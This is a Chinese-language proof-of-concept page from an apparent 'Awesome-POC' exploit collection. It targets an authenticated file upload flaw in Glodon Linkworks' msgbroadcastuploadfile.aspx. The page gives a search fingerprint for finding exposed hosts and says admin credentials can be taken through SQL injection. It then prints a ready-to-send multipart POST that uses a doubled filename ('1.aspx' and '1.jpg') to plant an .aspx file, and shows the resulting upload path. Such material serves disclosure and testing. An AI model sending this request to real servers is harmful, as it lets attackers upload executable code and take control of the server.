Awesome-POC/Web应用漏洞/广联达 Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞.md

50 lines
1.3 KiB
Markdown
Raw Normal View History

2024-11-06 14:10:36 +08:00
# 广联达 Linkworks msgbroadcastuploadfile.aspx 后台文件上传漏洞
## 漏洞描述
广联达 Linkworks msgbroadcastuploadfile.aspx 存在后台文件上传漏洞攻击者通过SQL注入获取管理员信息后可以登陆发送请求包获取服务器权限
## 漏洞影响
广联达 Linkworks
## 网络测绘
```
web.body="/Services/Identification/"
```
## 漏洞复现
登陆页面
![image-20230828150337640](images/image-20230828150337640.png)
GTP.IM.Services.Group.WebSite.GTP.IM.Services.Group 存在文件上传,上传后在当前目录 Upload下
![image-20230828150355277](images/image-20230828150355277.png)
通过SQL注入获取管理员账号密码后登陆后台上传文件,验证POC
```
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Cookie: 0_styleName=styleA
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text
Test
------WebKitFormBoundaryFfJZ4PlAZBixjELj--
```
![image-20230828150407255](images/image-20230828150407255.png)
```
/GTP/IM/Services/Group/Upload/xxx-xxx-test.aspx
```
![image-20230828150419196](images/image-20230828150419196.png)